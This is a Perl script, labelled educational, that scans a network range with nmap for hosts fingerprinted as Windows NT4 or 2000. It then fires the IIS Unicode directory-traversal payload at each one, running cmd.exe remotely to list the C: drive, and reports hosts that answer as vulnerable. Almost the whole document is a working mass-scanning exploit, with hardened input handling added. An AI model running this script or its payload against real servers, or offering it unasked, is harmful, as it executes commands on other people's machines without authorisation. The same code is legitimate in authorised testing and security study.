#!/usr/bin/perl 
# uni-test.pl
# this is a test program and should be used for educational purposes ONLY!
# NOTE: this was written on a Red Hat Linux 6.2 (x86) system.
# You will also need to download and install the LWP::Simple module for Perl.

use LWP::Simple;
use Getopt::Std;
use File::Temp qw(tempfile);
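use strict;
use warnings;

# Command line: -v (show nmap output), -t <target> (required), -? (help).
my %args;
getopts("vt:?", \%args) or usage();

# usage() prints the help text and exits, so nothing below runs without a target.
usage() if $args{"?"};
usage() unless defined $args{t} && length $args{t};

my $target = $args{t};

# The target is placed on nmap's command line. Accept only the characters that
# occur in host names, addresses, CIDR masks and nmap ranges, and refuse a
# leading "-" so the value can never be read as an nmap option.
if ( $target !~ m{\A[A-Za-z0-9*][A-Za-z0-9.,*/-]*\z} ) {
    die "Refusing target '$target': expected a host name, address or nmap range\n";
}

# nmap's machine-readable report goes to a private, unpredictably named file.
# This script runs as root, and a fixed name under /tmp could be pre-created
# or symlinked by another local user before nmap writes to it.
my ( $scan_fh, $scan_file ) =
    tempfile( 'uni-test-XXXXXX', TMPDIR => 1, UNLINK => 1 );
close($scan_fh);

print "Running nmap...\n";
my @nmap_cmd = ( 'nmap', '-sS', '-p', '80', '-O', $target, '-oM', $scan_file );

# List-form pipe open starts nmap directly, with no shell in between, so the
# target string is passed as a single argument and never interpreted.
open( my $nmap_out, '-|', @nmap_cmd ) or die "Cannot run nmap: $!\n";
while ( my $nmap_line = <$nmap_out> ) {
    # Without -v the human-readable nmap output is read and dropped.
    print $nmap_line if $args{v};
}
close($nmap_out) or warn "nmap did not exit cleanly (status $?)\n";

open( my $results, '<', $scan_file )
    or die "Cannot open file: $scan_file: $!\n";
print "Please hold checking all servers in list\n";
print "----------------------------------------\n\n";
LINE: while ( my $line = <$results> ) {
    # Skip blank lines, the nmap banner and comment lines.
    next LINE if $line =~ /^\n/;
    next LINE if $line =~ /Starting nmap/;
    next LINE if $line =~ /^\#/;

    if ( $line =~ /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/ ) {
        my ( $ipaddress, $osguess ) = ( $1, $2 );

        # Only hosts whose OS guess names NT4 or Windows 2000 are checked.
        if ( $osguess =~ /NT4/ || $osguess =~ /Windows 2000/ ) {
            print "Checking $ipaddress for uni-code exploit\n";
            my $content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\");

            # get() returns undef when the request fails; that is not
            # evidence either way, so only a returned listing is reported.
            if ( defined $content && $content =~ /Directory of c\:\\/ ) {
                print "$ipaddress is vulnerable\n";
            }
        }
    } else {
        warn "Cannot parse: $line";
    }
}
close($results);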

# usage - write the command-line help text to STDOUT and end the program.
# Never returns to the caller.
sub usage {
    # Single-quoted heredoc: the text holds nothing to interpolate.
    my $help_text = <<'USAGE';
Usage: perl uni-test.pl [-v?] -t <target host/net>
       -v           Verbose ( Show nmap output )
       -?           Show this screen
       -t <target>  <target> is the nmap host or range you would like to scan
                     sample: 192.168.0.2-254

Note: This program requires you to be root, and for you to have the program NMAP installed.

USAGE
    print $help_text;
    exit;
}
    
    

	
    

